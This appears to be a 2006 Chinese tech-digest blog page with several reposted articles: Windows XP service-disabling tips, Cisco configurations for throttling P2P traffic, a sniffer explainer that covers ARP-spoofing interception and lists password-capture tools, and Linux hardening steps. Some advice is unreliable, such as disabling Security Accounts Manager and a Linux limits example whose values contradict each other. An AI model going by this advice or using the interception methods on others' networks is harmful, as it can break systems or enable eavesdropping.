出处:PConline论坛 作者:RedAce
关于文章和作者:
堪称目前最完整、最通俗易懂的系统服务解释及应用。此文最大的特色莫过于作者用通俗易懂地语言,通过实践,告诉我们,禁用了某项服务会带来什么后果。还非常体贴地为我们把各种服务分类。绝对通俗易懂,绝对经典。推荐电脑配置一般地朋友都来优化一下!
作者很谦虚,投稿时把文章称为《简析各项系统服务与日常应用程序的相关性》。不过小编认为:过分的谦虚就是骄傲。相信您看完这篇文章后,肯定会认同我的看法。
文章正文:
经常有人问起,XP系统里各项服务哪些可以关闭,以节省系统资源,此前我也曾多次在太平洋论坛答复过一些此类问题,每次都要花费一定的时间来分辨各人的系统进程,而且只能帮助一个人。这一次,我就将自己使用WINDOWS XP系统五年来,对于系统服务的一点认识写出来,供大家参考、拍砖。
首先要说明一下我现用的机器配置、常用软件和网络环境。
我现用的机器配置是奔三 650MHz,256M内存,40G硬盘,ATI 8M显卡,呵呵,很古董吧,不过应付日常办公娱乐还是没问题的,优化一下还可以玩CS和极品飞车6。常用的操作系统是WINDOWS XP SP2,最常用办公软件是OFFICE 97,也装有OFFICE 2003和WPS OFFICE 2005以应付一些特殊需要。
上网用的是MYIE2和OPERA,使用卡巴斯基防病毒。这台本本每天至少要在两种网络环境中切换:日常办公使用公司局域网、在家使用GPRS(与ADSL拨号上网一样使用动态IP),我尔通过切换代理服务软件使用FOXMAIL收私人邮件。
所以,个人认为我的机器使用环境还是具有一定代表性的,因此所进行的系统服务优化方案具有较广的适用范围。系统服务进行优化后,以后的使用就基本上无需再进行调整了。
评价一个操作系统,最常用的指标包括安全性、稳定性、易用性、运行效率等。下面,就按照这个顺序,对WINDOWS XP系统的服务分类进行逐一说明。
一、关系到系统安全的服务
在病毒横行的今天,系统安全可能是最受关注的问题了,除了病毒、外来恶意程序以外,微软默认开启的系统服务也存在一些值得反思的问题。
1、Portable Media Serial Number Service
描述:Retrieves the serial number of any portable media player connected to this computer. If this service is stopped, protected content might not be down loaded to the device.
进程名:svchost.exe
这项服务表面上看只有一个作用,向微软报告你有的Windows Media Player播放器的序列号,但我们实在不知道它是否还报告了其他东西,所以我坚决设为禁用,这并不影响使用WMP收看网络电影、电视。
2、Remote Registry
描述:使远程用户能修改此计算机上的注册表设置。如果此服务被终止,只有此计算机上的用户才能修改注册表。如果此服务被禁用,任何依赖它的服务将无法启动。
进程名:svchost.exe
光看描述就知道这绝对是一项垃圾服务,实在不明白微软为什么会默认将其设为自动,我是坚决将其改为禁用,因为从不使用远程协助功能。
3、Security Accounts Manager
描述:存储本地用户帐户的安全信息。
进程名:lsass.exe
存储是为了留给谁的?不知道。那我就不存储了,禁用。
4、Shell Hardware Detection
描述:为自动播放硬件事件提供通知。
进程名:svchost.exe
当放入一张光盘或U盘后,机器就自动出现光盘里的引导程序画面或询问用什么程序打开U盘里的文件,这就是该项服务辛勤工作的成果。是否关闭看个人的使用习惯,从安全的角度出发,我还是习惯将其禁用,这样就不怕光盘自启动程序夹带恶意程序,也不会占用大量系统资源运行一些不必要的程序。
二、关系到系统稳定、便捷的服务
现今,各种针对WIDNOWS XP系统的优化方法数不胜数,在有GHOST保驾下,我们完全可以积极尝试。如果不想过多的进行那种高风险试验,又让自己的操作系统方便易用、稳定且兼容性良好,那就千万不要禁用下面这些服务,这是我进行N次高风险试验后总结的一点心得。
5、COM+ System Application
描述:管理 基于COM+ 组件的配置和跟踪。如果服务停止,大多数基于 COM+ 组件将不能正常工作。如果本服务被禁用,任何明确依赖它的服务都将不能启动。
进程名:dllhost.exe
可以设为手动,若禁用的话,WPS OFFICE 2005及其他一些需要调用COM+组件的软件就无法启动。
6、DCOM Server Process Launcher
描述:为 DCOM 服务提供加载功能。
进程名:svchost.exe
不知道微软是怎么想的,关于这项重要的服务的描述居然这么短,而那些莫名其妙的服务的描述却又那么长而难懂。我将其设为自动,原因是设为手动的话,任何一个程序都不会在需要的时候自动开启该服务,而WPS OFFICE 2005和磁盘管理、磁盘整理等程序都要用上它。将其禁用的话,重启系统后,系统栏那个反映网络连通状况的小电脑图标就会消失了,哪怕你拔掉网线它也不会冒出来。这项服务似乎与任何一项网络应用均无实际关联,禁用后仍可正常使用局域网或使用ADSL拨号、GPRS上网。
7、Event Log
描述:启用在事件查看器查看基于 Windows 的程序和组件颁发的事件日志消息。无法终止此服务。
进程名:services.exe
与DCOM Server Process Launcher服务一样,确是无法终止,但可以禁用。不过禁用了至少会有一个麻烦,系统开机时会让你至少多等一分钟,所以还是老老实实设为自动的好。
8、kavsvc
描述:Provides anti-virus functionality of Personal, installed on your computer.
进程名:kavsvc.exe
这个就不必说了吧,大名鼎鼎的卡巴斯基,后台监控程序,设为自动。
9、Logical Disk Manager
描述:监测和监视新硬盘驱动器并向逻辑磁盘管理器管理服务发送卷的信息以便配置。如果此服务被终止,动态磁盘状态和配置信息会过时。如果此服务被禁用,任何依赖它的服务将无法启动。
进程名:svchost.exe
设为手动即可。遇上U盘之类的东东插上机器却无反应需要用到磁盘管理时,它是会自动启用的。
10、Logical Disk Manager Administrative Service
描述:配置硬盘驱动器和卷。此服务只为配置处理运行,然后终止。
进程名:dmadmin.exe
只在硬盘分区调整后的第一次系统重启时会用到,其他时候基本在放假,设为手动就行了。
11、Net Logon
描述:支持网络上计算机 pass-through 帐户登录身份验证事件。
进程名:lsass.exe
你会用到这个莫名其妙的帐户吗?估计很少有人会,但若设为禁用,在某些机器上会出现系统无法登录的现象,设为手动即可。
12、NT LM Security Support Provider
描述:为使用传输协议而不是命名管道的远程过程调用(RPC)程序提供安全机制。
进程名:lsass.exe
不清楚具体作用是什么,但禁用的话极有可能导致系统无法登录,设为手动即可。
13、P
lug and Play
描述:使计算机在极少或没有用户输入的情况下能识别并适应硬件的更改。终止或禁用此服务会造成系统不稳定。
进程名:services.exe
不管你是否相信微软,但他的这个描述你一定得相信,否则使用U盘、打印机时麻烦一定不少,此项服务应该设为自动。
14、Remote Procedure Call (RPC)
描述:提供终结点映射程序 (endpoint mapper) 以及其它 RPC 服务。
进程名:svchost
还记得冲击波吗?那东东就是拿它下手。不过,要是你禁用或将其设为了手动以后还能正常进入系统,那真的叫奇迹。
15、Windows Audio
描述:管理基于 Windows 的程序的音频设备。如果此服务被终止,音频设备及其音效将不能正常工作。如果此服务被禁用,任何依赖它的服务将无法启动。
进程名:svchost.exe
在WINDOWS 2003中,这项服务被默认禁用,想听歌得手动启用。估计现今不会有谁的机器没有声卡吧,那就设为自动吧。
16、Windows Management Instrumentation
描述:提供共同的界面和对象模式以便访问有关操作系统、设备、应用程序和服务的管理信息。如果此服务被终止,多数基于 Windows 的软件将无法正常运行。如果此服务被禁用,任何依赖它的服务将无法启动。
进程名:svchost.exe
搞不清这东东存在有什么意义,经验告诉我,禁用它,系统稳定性反而会有所好转。
三、一些安装大型软件必须用到的服务
这些服务平时基本不用,但在安装OFFICE、一些大型游戏等软件时却必须开启,否则肯定会反复报错,无法安装。
17、Application Management
描述:提供软件安装服务,诸如分派,发行以及删除。
我的进程中通常有5个svchost.exe,但不会是它。一般在安装一些程序时会被开启,比如OFFICE 2003,通常设为手动。一般的安装程序不会用到这项服务,若有程序安装时提示某项服务未启用,再手动启用下就OK。
18、ASP.NET State Service
描述:Provides support for out-of-process session states for ASP.NET. If this service is stopped, out-of-process requests will not be processed. If this service is disabled, any services that explicitly depend on it will fail to start.
若有安装.NET开发环境,就会有这项服务,我装了Framework,目的是运行nlite精减系统安装程序。通常设为禁用,用的时候临时启用下便是。我想,不会有人有事没事制作系统精简光盘吧。
19、Windows Installer
描述:添加、修改和删除以 Windows 安装程序(*.msi)的软件包提供的应用程序。如果禁用了此服务,任何完全依赖它的服务不会被启动。
进程名:msiexec.exe
只在安装OFFICE、大型游戏、微软补丁等东东时会用上,设为手动即可,要用的时候它会自个启动。
四、一些非必需服务
下列服务并不是系统正常工作所必须启动的,但却与我们一些日常应用息息相关,可以有选择的启动或禁用。
20、Fast User Switching Compatibility
描述:为在多用户下需要协助的应用程序提供管理。
进程名:svchost.exe
若系统只有一个用户名,大胆设为禁用吧。就算有多个用户名,设为手动就行。事实上,我用两个用户名的时候,设为禁用也可以进行切换。
21、Human Interface Device Access
描述:启用对智能界面设备 (HID)的通用输入访问,它激活并保存键盘、远程控制和其它多媒体设备上的预先定义的热按钮。如果此服务被终止,由此服务控制的热按钮将不再运行。如果此服务被禁用,任何依赖它的服务将无法启动。
进程名:svchost.exe
若在用USB鼠标或手写板一类的东东,禁用这项服务会带来灾难。若用PS/2鼠标,大胆设为禁用吧。不过有些主板似乎不受影响,禁用该服务后照样能正常使用USB鼠标。
22、Network Connections
描述:管理“网络和拨号连接”文件夹中对象,在其中您可以查看局域网和远程连接。
进程名:svchost.exe
局域网用户可以设为手动,开机时会自动启动,若禁用,将无法使用网络邻居。非局域网用户设为禁用。禁用后,进程中的svchost.exe会由5个减至4个。
23、Network Location Awareness (NLA)
描述:收集并保存网络配置和位置信息,并在信息改动时通知应用程序。
进程名:svchost.exe
与22、Network Connections服务配套使用,设置原则相同。若禁用,进程中的svchost.exe也会减少1个。若与Network Connections一同禁用,进程中的svchost.exe就会减少到3个。
24、Performance Logs and Alerts
描述:收集本地或远程计算机基于预先配置的日程参数的性能数据,然后将此数据写入日志或触发警报。如果此服务被终止,将不会收集性能信息。如果此服务被禁用,任何依赖它的服务将无法启动。
进程名:smlogsvc.exe
系统预读,你有启用吗?我觉得启用前后对启动速度并无影响,所以“禁用”。如果你有用到启动预读功能,那就设为自动吧。
25、Print Spooler
描述:将文件加载到内存中以便迟后打印。
进程名:spoolsv.exe
要使用打印机或打印预览功能的机器,必须将此项服务设为自动。没有这项服务需要的用户,可以设为禁用。注意,绝大部分局域网安装的OA、ERP系统会需要这项服务读写电子版公文。
26、Protected Storage
描述:提供对敏感数据(如私钥)的保护性存储,以便防止未授权的服务,过程或用户对其的非法访问。
进程名:lsass.exe
登录网站时,单击用户名那一栏,会有一个以往登录时输入的用户名,只要选中,相应的密码就会自动填上,支持这种偷懒功能的就是这项服务。若想确保系统安全或个人隐私,禁用是个好办法,我就是这么干的。
27、Remote Access Connection Manager
描述:创建网络连接。
进程名:svchost.exe
若是局域网,完全可以设为禁用。若是ADSL,我是GPRS上网,就必须设为手动或自动,否则没法上网。ADSL拨号的用户也必须设为手动或自动,否则一样不能上网。
28、Remote Procedure Call (RPC) Locator
描述:管理 RPC 名称服务数据库。
进程名:locator.exe
设为手动,有需要时会自动启用,但我忘了是在什么时候启用过。
29、Routing and Remote Access
描述:在局域网以及广域网环境中为企业提供路由服务。
进程名:svchost.exe
一般用户根本用不上,禁用。要用它的人根本就不会再问别人它是干什么的了。
30、Secondary Logon
描述:启用替换凭据下的启用进程。如果此服务被终止,此类型登录访问将不可用。如果此服务被禁用,任何依赖它的服务将无法启动。
进程名:svchost.exe
不知微软想干什么,一个简单的东西硬要说得这么复杂,这项服务只有一个功能,那就是支持在不同用户间进行切换。机器上只有一个用户名的完全可以设为禁用,就像我这样。
31、Server
描述:支持此计算机通过网络的文件、打印、和命名管道共享。如果服务停止
分类 : 技术文摘 | 发表时间 04-05-2006
分类 : 技术文摘 | 发表时间 26-04-2006
用户疯狂bt(p2p软件)对网络的使用造成了极大危害,目前常用的办法是:
方法1、采用Cisco公司的nbar来限制;
配置步骤如下:
————定义Class-map————-;
!
class-map match-all bittorrent
match protocol bittorrent
class-map match-all edonkey
match protocol edonkey
!
注意:如果match protocol命令里没有bittorrent、edonkey选项,那么说明你的IOS版本还没有包括此协议,此时你需要到Cisco网站上下载bittorrent.pdlm、edonkey.pdlm文件,上传到路由器上,然后定义这种协议:
ip nbar pdlm bittorrent.pdlm
ip nbar pdlm edonkey.pdlm)
————定义policy-map————-;
!
policy-map limit-bt
class bittorrent
drop
class edonkey
drop
!
————应用到接口上————–;
!
interface f0/0
service-policy input limit-bt
service-policy output limit-bt
!
说明:这种方法使用后对一些p2p软件确实起作用,但目前Cisco只定义了少数几个协议(bittorrent、edonkey、kazaa2、gnutella、napster、winmx、fasttrack等),不能覆盖所有的此类软件,这有待于Cisco的继续努力;
方法2、采用ACL方法;
我们可以采用以下方式来配置ACL,一种是开放所有端口,只限制bt的端口,配置如下;
!
access-list 101 deny tcp any any range 6881 6890
access-list 101 deny tcp any range 6881 6890 any
access-list 101 permit ip any any
!
说明:这种方法有其局限性,因为现在有的p2p软件,端口可以改变,封锁后会自动改端口,甚至可以该到80端口,如果连这个也封,那网络使用就无法正常工作了;另外一种方式是只开放有用的端口,封闭其他所有端口;
!
access-list 101 permit tcp any any eq 80
access-list 101 permit tcp any any eq 25
access-list 101 permit tcp any any eq 110
access-list 101 permit tcp any any eq 53
access-list 101 deny ip any any
!
说明:此方法是对网络进行严格的控制,对简单的小型网络还可行,而如果是大型网络,数据流量又很复杂那么管理的难度将非常大;
还有一种方式是对端口是3000以上的流量进行限速;因为多数蠕虫病毒和p2p的端口都是大于3000的,当然也有正常的应用是采用3000以上的端口,如果我们将3000以上的端口封闭,这样正常的应用也无法开展,所以折中的方法是对端口3000以上的数据流进行限速,例如:
————定义Class-map————–;
!
class-map match-all xs
match access-group 101
!
————定义policy-map————-;
policy-map xs
class xs
police cir 1000000 bc 1000 be 1000 conform-action transmit exceed-action drop violate-action drop
!
————定义ACL——————–;
!
access-list 101 permit tcp any any gt 3000
access-list 101 permit udp any any gt 3000
!
————应用到接口上—————;
interface f0/0
service-policy input xs
!
方法3、采用NAT的单用户连接数限制;
在Cisco IOS 12.3(4)T 后的IOS软件上支持NAT的单用户限制,即可以对做地址转换的单个IP限制其NAT的表项数,因为p2p类软件如bt的一大特点就是同时会有很多的连接数,从而占用了大量的NAT表项,因此应用该方法可有效限制bt的使用,比如我们为IP 10.1.1.1设置最大的NAT表项数为200;正常的网络访问肯定够用了,但如果使用bt,那么很快此IP的NAT表项数达到200,一旦达到峰值,该IP的其他访问就无法再进行NAT转换,必须等待到NAT表项失效后,才能再次使用,这样有效的保护了网络的带宽,同时也达到了警示的作用。
例如限制IP地址为10.1.1.1的主机NAT的条目为200条,配置如下:
ip nat translation max-entries host 10.1.1.1 200
如果想限制所有主机,使每台主机的NAT条目为200,可进行如下配置:
ip nat translation max-entries all-host 200
以上我们总结了目前可用的限制bt(p2p软件)的一些方法,具体采用哪种方法只能您根据自己网络的状况来定,当然也可以将几种方法结合起来使用。
分类 : 技术文摘 | 发表时间 23-04-2006
Sniffer(嗅探器)是一种常用的收集有用数据方法, 这些数据可以是用户的帐号和密码, 可以是一些商用机密数据等等. Sniffer可以作为能够捕获网络报文的设备, ISS为Sniffer这样定义:Sniffer是利用计算机的网络接口截获目的地为其他计算机的数据报文的一种工具.
Sniffer根据网络的类型分为两个类别: 1.交换环境下的Sniffer 2.共享环境下的Sniffer
交换环境下的Sniffer往往是通过对交换机进行ARP欺骗, 变成一个中间人进行截获数据.
共享环境下的Sniffer仅仅只需要把本机的网卡设置为混杂模式就可以监听网络上所有的数据报, 而不需要进行任何欺骗行为.
Sniffer的原理:
交换环境的网络使用交换机(Switch)连接各个网络节点, 而共享环境的网络则采用集线器连接各个节点.
先说共享环境吧, 共享网络也成为集线器网络, 数据报到达集线器以后, 集线器会把数据报转发到每个集线器的端口, 换句话说, 集线器连接的每个网络节点都有权利收到所有的数据报. 运行Sniffer以后, Sniffer会把网卡设置为混杂模式, 一旦设置为混杂模式, Sniffer就可以接受所有的数据报, 这样也就达到了Sniffer的目的.
交换环境, 通过使用交换机代替共享环境下的集线器, 能够解决集线器的几个安全问题, 交换机通过自己的ARP缓存列表来决定把数据报发送到某个端口, 这样就不是把一个数据报转发到各个端口了, 这样的做法一方面大大提高了网络的性能, 另一方面也提高了安全性, 在交换环境下, 即使网卡设置为混杂模式, 也只能监听本机的数据包, 因为交换机不会把其他节点的数据报转发给嗅探主机了. 所以, 在交换环境下必须想办法让被嗅探主机的数据报发到嗅探主机来, 能够实现这种目的方法叫做ARP欺骗(ARP Spoofing), 这种方式通过伪造ARP数据包欺骗交换机使交换机更新ARP缓存列表达到欺骗的目的, 这样发送到被嗅探的主机的数据报完全转发到嗅探主机来, 而被嗅探主机收不到任何的数据包, 为了使得能够正常的截获数据报, 嗅探主机除了充当嗅探的身份之外, 还要充当中间人的身份. 具体的原理和方式可以去Google上搜索ARP欺骗.
交换环境下在不使用ARP欺骗的情况下, 如何能够进行整网的数据分析呢 我提供2种方法进行参考:
1. 在根节点使用带有镜像功能的交换机, 这种功能的交换机可以设置为把所有的数据报都转发到某一指定端口上, 在该端口上可以连接运行Sniffer的主机.
2. 如果您的根节点交换机没有这种功能, 那么可以在根节点上方添加一台集线器, 集线器1个端口连接交换机, 另外一个端口就可以连接运行Sniffer的主机了.
下面的这些是我个人认为比较经典的Sniffer,值得收藏.
1. libpcap
版本: v0.8.3
更新日期: 2004-03-30
介绍: libpcap是Unix或Linux从内核捕获网络数据包的必备工具, 它是独立于系统的API接口, 为底层网络监控提供了一个可移植的框架, 可用于网络统计收集、安全监控、网络调试等应用. 很多Unix或Linux下的网络程序都需要libpcap才能够运行. Windows平台下类似的程序为Winpcap.
下载路径: Software/Network/libpcap/ (包括最新版、稳定版以及开发文档)
2. Winpcap
版本: v3.1 Beta3
更新日期: 2004-05-15
介绍: WinPcap类似于libpcap, 支持Win32平台, Winpcap提供了3个模块:NPF(Netgroup Packet Filter,内核级的数据报过滤器),packet.dll(底层的动态连接库),wpcap.dll(架构在packet.dll之上,提供了更方便、更直接的编程方法). 很多网络工具(Sniffer等)都是使用Winpcap进行开发的, 运行这些网络工具, 均需要安装Winpcap. 我曾经使用过VBS调用Winpcap写过console下的Sniffer. ~_*
下载路径: Software/Network/Winpcap/ (包括最新版、稳定版以及开发文档)
3. Network Associates Sniffer Portable
版本: v4.7.5 SP4
更新日期: 2004-05-20
介绍: NAI 公司出品的Sniffer, 作为NAI公司的主打产品, 价格也是不菲的. Sniffer Portable 是一系列网络故障和性能管理解决方案, 网络专业人士可以使用它对多拓朴结构和多协议网络进行维护、故障解决、优化调整和扩展. Sniffer Portable 软件可以在桌面机、便携式计算机或者笔记本等硬件平台上运行, 并且可以利用高级自定义硬件组件确保全线速的捕获能力. Sniffer Portable非常出色, 其区别于其它Sniffer主要为以下几个方面:
自定义硬件:
通过自定义硬件, 使Sniffer Portable可以实现线速捕捉、过滤以及触发功能.
详细的报告:
可以生成基于 RMON1/RMON2 的图形报告, 以及由 Sniffer Portable 应用程序收集的类似数据. 从带宽使用率到潜在的网络衰减, Sniffer Reporter 提供详尽数据来帮助您规划未来的网络需求. 有关以太网和令牌环的可用报告包括: 主机表、矩阵、协议分发、全局统计及其他报告.
Sniffer Voice 选项:
Sniffer Voice 是一个与 Sniffer Portable 集成的增值包,它提供语音和视频聚合流量的必要信息, 主要用于VoIP网络.
下载路径: Software/Network/Network.Associates.Sniffer.Portable.v4.7.5.SP4/
4. WildPackets EtherPeek NX
版本: v2.1
更新日期: 2004-06-12
介绍: EtherPeek NX 是第一个提供信息包捕获过程中实时进行专业诊断和结构解码的网络协议分析器. EtherPeek NX专门为IT人员设计, 帮助他们分析和诊断日益加速变化的网络数据群, 对现今网络面临的众多故障提供精确和最新的分析. 我收藏的这个版本中包括iNetTools和PacketGrabber两款附带产品, iNetTools提供了一些比较有用的网络工具(Ping,Ping Scan,Trace Route,Name Lookup,Name Scan, DNS Lookup,Port Scan,Service Scan,Finger,Whois以及Throughput), PacketGrabber是一款远程数据报收集程序. 同时也提供了Peek SDK, 方便用户自己开发插件, SDK文档在安装路径下1033\Documents\Peek SDK\的目录里.
适用于Windows的EtherPeek是一种屡受嘉奖的以太网流量和协议分析器. EtherPeek确立了“轻松使用”的行业标准. EtherPeek 是”全球国际网络测试联盟”从五种网络分析器中评选出的最优产品.
下载路径: Software/Network/WildPackets.EtherPeek.NX.v2.1/
5. Iris Network Traffic Analyzer
版本: v4.0.7
更新日期: 2003-12-29
介绍: 由业内知名公司Eeye出品的Sniffer, Iris的优点在于:便于使用、全面丰富的流量状态和报告、高级数据重建功能、精密的数据包操作和伪造能力、扩展的过滤功能、数据分析能力.
个人认为Iris在数据重建功能、数据包伪造以及数据分析能力上比较突出. 数据重建功能可以把原始的数据包还原成完整的HTTP、FTP、SMTP和POP3会话.使用Iris的数据重建功能可以很轻松的查看网络传输的Mail信件、用户浏览的网页以及未加密的FTP传输. Iris的数据包编辑器可以让用户创建自定义的或者欺骗的数据包. 数据分析能力上在于Iris 可以分析其他知名的Sniffer保存的数据包捕捉文件.
另外值得一提的是, Eeye公司站点上免费提供一些定义好的过滤器文件, 大部分主要是针对病毒和蠕虫的.
下载路径: Software/Network/Iris.Network.Traffic.Analyzer.v4.07/
6. TamoSoft CommView
版本: v4.1.344
更新日期: 2004-02-19
介绍: CommView系列是Windows下比较优秀的商业Sniffer产品, 支持NDIS3.0驱动标准, 功能大致上和其他一些Sniffer差不多, 另外, 结合CommView Remote Agent可以实现远程嗅探.
TamoSoft CommView for WIFI
版本: v4.2.360
更新日期: 2004-04-09
介绍: CommView
for WiFi 是CommView的特别版本, 设计用来捕获和分析无线网络, 支持802.11a/b/g协议.
下载路径: Software/Network/TamoSoft.CommView/
TamoSoft CommView Remote Agent
版本: v1.1.43
更新日期: 2004-03-04
介绍: CommView Remote Agent 是CommView的专用的、可选的组件, 设计用来进行远程网络监视.
下载路径: Software/Network/TamoSoft.CommView/
7. Ettercap
版本: NG 0.7.0 RC1
更新日期: 2004-06-14
介绍: Ettercap 是一套LAN下中间人攻击的工具, 属于开源项目, 支持多种平台(Linux, BSD, Windows, Solaris,Mac OS), 其功能包括嗅探活动连接、On the Fly模式的内容过滤以及其它一些有趣的欺骗功能. Ettercap 支持主动和被动多种协议的分析, 并包括其他网络和主机分析的功能. 另外, Ettercap具有插件功能, 自带不少功能不错的插件, 也允许第三方编写插件. 在安装了OpenSSL以后可以支持SSH1以及HTTPS.
下载路径: Software/Network/Ettercap/
8. Ethereal
版本: v0.10.4
更新日期: 2004-05-13
介绍: Ethereal 是全球最流行的网络协议分析器, 功能强大而且支持平台最多的一款Sniffer(支持以下平台:Windows, Linux, Solaris, Mac OS, BSD, BeOS, Tru64 Unix, HP-UX, AIX, Irix等), 属于开源项目. 支持分析的协议有512种之多, 支持实时和非实时两种模式.Windows下运行需要Winpcap库.
下载路径: Software/Network/Ethereal/ (包括源代码和Windows下的安装文件)
9. Packetyzer
版本: v2.0.0
更新日期: 2004-04-22
介绍: Packetyzer 是为数不多的开源的Windows平台下的优秀Sniffer, 支持483种协议, 与Neutrino Sensor结合在一起可以截获和分析802.11数据包, 我个人比较喜欢Packetyzer的数据报标记色彩功能. 需要安装Winpcap.
下载路径: Software/Network/Packetyzer/ (包括源代码和安装文件)
10. Cain & Abel
版本: v2.5 Beta56
更新日期: 2004-06-14
介绍: Cain & Abel 是一套Windows平台下强大的密码截获与破解工具, 只所以我把它归纳为Sniffer里面来, 主要是因为Cain & Abel主要的功能在于Sniffer方面, 它支持共享环境和交换环境下进行截获, Cain 和 Abel是分开的的两个工具(Cain作为客户端,Abel作为服务端). 功能非常之强大, 详细功能请访问: http://www.oxid.it/cain.html . 在新的版本中增加了无线网络的支持. 运行需要Winpcap.
下载路径: Software/Network/Cain&Abel/
11. TCPDump / WinDump
版本: v3.8.3
更新日期: 2004-03-30
介绍: Tcpdump是一款众人皆知和受人喜欢的基于命令行的网络数据包分析和嗅探工具. 它能把匹配规则的数据包的包头给显示出来, 使用TCPDump去查找网络问题或者去监视网络上的状况. WinDump是Tcpdump在Windows平台上的移植版.
下载路径: Software/Network/TCPDump/ (包括TCPDump和WinDump)
12. dsniff
版本: v2.4 Beta2
更新日期: 2004-06-14
介绍: dsniff 是一个 UNIX 可执行工具的集合, 它是为执行网络审核和网络渗透而设计的. 拥有ARP欺骗功能, 应该也能算是最早具有交换环境下嗅探功能的Sniffer了. 作者已经在 OpenBSD、Red Hat Linux 和 Solaris 下对它进行了测试. 一个早期版本(1.8)已经被移植到 Windows 下. dsniff 最早由 Dug 于 1999 年 12 月发布. dsniff 依赖于一些第三方软件包, 包括 Berkeley DB、OpenSSL、libnet、和 libnids.
下载路径: Software/Network/dsniff/ (包括2.3,2.4b1,2.4b2以及1.8 for Windows版本)
13. sniffit
版本: v0.37 Beta
更新日期: 1998-07-17
介绍: Sniffit是由Lawrence Berkeley Laboratory开发的,可以在Linux、Solaris、SGI、Windows等各种平台运行的Sniffer,提供了不少商业版Sniffer所没有的功能,支持脚本和插件功能. 另外可以使用tod(Touch of Death)插件, tod通过向目标机器发送RST包来切断目标机器的TCP连接. Windows版本由Symbolic迁移, 运行需要Winpcap.
下载路径: Software/Network/sniffit/
14. Snarp
版本: v0.9h
更新日期: 2001-03-21
介绍: Windows 平台下交换网络的嗅探器. 具体的说明请参照Readme.txt.
下载路径: Software/Network/Snarp/
15. ARPSniffer
版本: v0.5
更新日期: 2002-08-12
介绍: 小榕写的Windows 平台下交换网络的嗅探器. 另外在流光5中, 增加了Remote ANS(Remote ARP Network Sniffer)功能,这个工具采用了Sensor/GUI的结构. 运行需要Winpcap.
分类 : 技术文摘 | 发表时间 23-04-2006
关于分区
一个潜在的黑客如果要攻击你的Linux服务器,他首先就会尝试缓冲区溢出。在过去的几年中,以缓冲区溢出为类型的安全漏洞是最为常见的一种形式了。更为严重的是,缓冲区溢出漏洞占了远程网络攻击的绝大多数,这种攻击可以轻易使得一个匿名的Internet用户有机会获得一台主机的部分或全部的控制权!
为了防止此类攻击,我们从安装系统时就应该注意。如果用root分区纪录数据,如log文件和email,就可能因为拒绝服务产生大量日志或垃圾邮件,从而导致系统崩溃。所以建议为/var开辟单独的分区,用来存放日志和邮件,以避免root分区被溢出。最好为特殊的应用程序单独开一个分区,特别是可以产生大量日志的程序,还有建议为/home单独分一个区,这样他们就不能填满/分区了,从而就避免了部分针对Linux分区溢出的恶意攻击。
关于BIOS
记着要在BIOS设置中设定一个BIOS密码,不接收软盘启动。这样可以阻止不怀好意的人用专门的启动盘启动你的Linux系统,并避免别人更改BIOS设置,如更改软盘启动设置或不弹出密码框直接启动服务器等等。
关于口令
口令是系统中认证用户的主要手段,系统安装时默认的口令最小长度通常为5,但为保证口令不易被猜测攻击,可增加口令的最小长度,至少等于8。为此,需修改文件/etc/login.defs中参数PASS_MIN_LEN(口令最小长度)。同时应限制口令使用时间,保证定期更换口令,建议修改参数PASS_MIN_DAYS(口令使用时间)。
关于Ping
既然没有人能ping通你的机器并收到响应,你可以大大增强你的站点的安全性。你可以加下面的一行命令到/etc/rc.d/rc.local,以使每次启动后自动运行,这样就可以阻止你的系统响应任何从外部/内部来的ping请求。
echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all
关于Telnet
如果你希望用户用Telnet远程登录到你的服务器时不要显示操作系统和版本信息(可以避免有针对性的漏洞攻击),你应该改写/etc/inetd.conf中的一行象下面这样:
telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd -h
加-h标志在最后使得telnet后台不要显示系统信息,而仅仅显示login。
关于特权账号
禁止所有默认的被操作系统本身启动的且不需要的帐号,当你第一次装上系统时就应该做此检查,Linux提供了各种帐号,你可能不需要,如果你不需要这个帐号,就移走它,你有的帐号越多,就越容易受到攻击。
为删除你系统上的用户,用下面的命令:userdel username
为删除你系统上的组用户帐号,用下面的命令:groupdel username
在终端上打入下面的命令删掉下面的特权用账号:
userdel adm
userdel lp
userdel sync
userdel shutdown
userdel halt
userdel mail
如果你不用sendmail服务器,就删除这几个帐号:
userdel news
userdel uucp
userdel operator
userdel games
如果你不用X windows 服务器,就删掉这个帐号。
userdel gopher
如果你不允许匿名FTP,就删掉这个用户帐号:
userdel ftp
关于su命令
如果你不想任何人能够su为root的话,你应该编辑/etc/pam.d/su文件,加下面几行:
auth sufficient /lib-
/security/pam_rootok-
.so debug
auth required /lib-
/security/pam_wheel-
.so group=isd
这意味着仅仅isd组的用户可以su作为root。如果你希望用户admin能su作为root.就运行下面的命令:
usermod -G10 admin
suid程序也是非常危险的,这些程序被普通用户以euid=0(即root)的身份执行,只能有少量程序被设置为suid。用这个命令列出系统的suid二进制程序:
suneagle# find / -perm -4000 -print
你可以用chmod -s去掉一些不需要程序的suid位。
关于账户注销
如果系统管理员在离开系统时忘了从root注销,系统应该能够自动从shell中注销。那么,你就需要设置一个特殊的 Linux 变量“tmout”,用以设定时间。 同样,如果用户离开机器时忘记了注销账户,则可能给系统安全带来隐患。你可以修改/etc/profile文件,保证账户在一段时间没有操作后,自动从系统注销。 编辑文件/etc/profile,在“histfilesize=”行的下一行增加如下一行:
tmout=600
则所有用户将在10分钟无操作后自动注销。注意:修改了该参数后,必须退出并重新登录root,更改才能生效。
关于系统文件
对于系统中的某些关键性文件如passwd、passwd.old、passwd._、shadow、shadown._、inetd.conf、services和lilo.conf等可修改其属性,防止意外修改和被普通用户查看。 如将inetd文件属性改为600:
# chmod 600 /etc/inetd.conf
这样就保证文件的属主为root,然后还可以将其设置为不能改变:
# chattr +i /etc/inetd.conf
这样,对该文件的任何改变都将被禁止。 你可能要问:那我自己不是也不能修改了?当然,我们可以设置成只有root重新设置复位标志后才能进行修改:
# chattr -i /etc/inetd.conf
关于用户资源
对你的系统上所有的用户设置资源限制可以防止DoS类型攻击,如最大进程数,内存数量等。例如,对所有用户的限制, 编辑/etc/security/limits.con加入以下几行:
* hard core 0
* hard rss 5000
* hard nproc 20
你也必须编辑/etc/pam.d/login文件,检查这一行的存在:
session required /lib/security/pam_limits.so
上面的命令禁止core files“core 0”,限制进程数为“nproc 50“,且限制内存使用为5M“rss 5000”。
关于NFS服务器
